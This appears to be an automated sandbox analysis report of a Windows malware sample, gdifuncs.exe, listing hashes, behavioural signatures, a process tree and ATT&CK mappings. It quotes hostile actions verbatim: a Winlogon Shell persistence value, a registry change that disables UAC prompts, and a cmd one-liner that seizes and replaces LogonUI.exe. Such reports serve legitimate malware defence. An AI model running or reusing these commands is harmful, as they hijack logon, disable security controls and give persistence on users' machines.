Analysis
-
max time kernel
191s -
max time network
172s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
25-06-2024 00:14
Static task
static1
Behavioral task
behavioral1
Sample
gdifuncs.exe
Resource
win11-20240508-en
Errors
General
-
Target
gdifuncs.exe
-
Size
120KB
-
MD5
e254e9598ee638c01e5ccc40e604938b
-
SHA1
541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
-
SHA256
4040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
-
SHA512
92f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb
-
SSDEEP
1536:DKOz5I1MSx56Hj2UItX85ljPQIe9RoSbGF4q2L6OBIyHwPSYxLanv9QD2i:vteMSMHj/rj1SbGFl2L6CIIw5gv9Qy
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" gdifuncs.exe -
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" gdifuncs.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 2164 icacls.exe 2304 takeown.exe 968 icacls.exe 4904 takeown.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4904 takeown.exe 2164 icacls.exe 2304 takeown.exe 968 icacls.exe -
Drops file in Windows directory 2 IoCs
Processes:
gdifuncs.execmd.exedescription ioc process File created C:\windows\WinAttr.gci gdifuncs.exe File opened for modification \??\c:\windows\WinAttr.gci cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 416 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2284 taskkill.exe -
Modifies Control Panel 3 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
gdifuncs.exepid process 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe 2796 gdifuncs.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
gdifuncs.exetakeown.exetakeown.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2796 gdifuncs.exe Token: SeDebugPrivilege 2796 gdifuncs.exe Token: SeTakeOwnershipPrivilege 4904 takeown.exe Token: SeTakeOwnershipPrivilege 2304 takeown.exe Token: SeDebugPrivilege 2284 taskkill.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
gdifuncs.execmd.exedescription pid process target process PID 2796 wrote to memory of 4904 2796 gdifuncs.exe takeown.exe PID 2796 wrote to memory of 4904 2796 gdifuncs.exe takeown.exe PID 2796 wrote to memory of 4904 2796 gdifuncs.exe takeown.exe PID 2796 wrote to memory of 2164 2796 gdifuncs.exe icacls.exe PID 2796 wrote to memory of 2164 2796 gdifuncs.exe icacls.exe PID 2796 wrote to memory of 2164 2796 gdifuncs.exe icacls.exe PID 2796 wrote to memory of 412 2796 gdifuncs.exe cmd.exe PID 2796 wrote to memory of 412 2796 gdifuncs.exe cmd.exe PID 2796 wrote to memory of 412 2796 gdifuncs.exe cmd.exe PID 412 wrote to memory of 2304 412 cmd.exe takeown.exe PID 412 wrote to memory of 2304 412 cmd.exe takeown.exe PID 412 wrote to memory of 2304 412 cmd.exe takeown.exe PID 412 wrote to memory of 968 412 cmd.exe icacls.exe PID 412 wrote to memory of 968 412 cmd.exe icacls.exe PID 412 wrote to memory of 968 412 cmd.exe icacls.exe PID 412 wrote to memory of 416 412 cmd.exe timeout.exe PID 412 wrote to memory of 416 412 cmd.exe timeout.exe PID 412 wrote to memory of 416 412 cmd.exe timeout.exe PID 412 wrote to memory of 2284 412 cmd.exe taskkill.exe PID 412 wrote to memory of 2284 412 cmd.exe taskkill.exe PID 412 wrote to memory of 2284 412 cmd.exe taskkill.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\gdifuncs.exe"C:\Users\Admin\AppData\Local\Temp\gdifuncs.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\windows\SysWOW64\takeown.exe"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\SysWOW64\icacls.exe"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65© "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\takeown.exetakeown /f LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls LogonUI.exe /granted "Admin":F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "tobi0a0c.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2796-0-0x000000007436E000-0x000000007436F000-memory.dmpFilesize
4KB
-
memory/2796-1-0x0000000000770000-0x0000000000792000-memory.dmpFilesize
136KB
-
memory/2796-2-0x00000000056E0000-0x0000000005C86000-memory.dmpFilesize
5.6MB
-
memory/2796-3-0x0000000005230000-0x00000000052C2000-memory.dmpFilesize
584KB
-
memory/2796-4-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-5-0x0000000005610000-0x000000000561A000-memory.dmpFilesize
40KB
-
memory/2796-6-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-7-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-8-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-9-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-10-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-11-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-12-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-13-0x000000007436E000-0x000000007436F000-memory.dmpFilesize
4KB
-
memory/2796-14-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-15-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-16-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-17-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-18-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-19-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-20-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-21-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB
-
memory/2796-22-0x0000000074360000-0x0000000074B11000-memory.dmpFilesize
7.7MB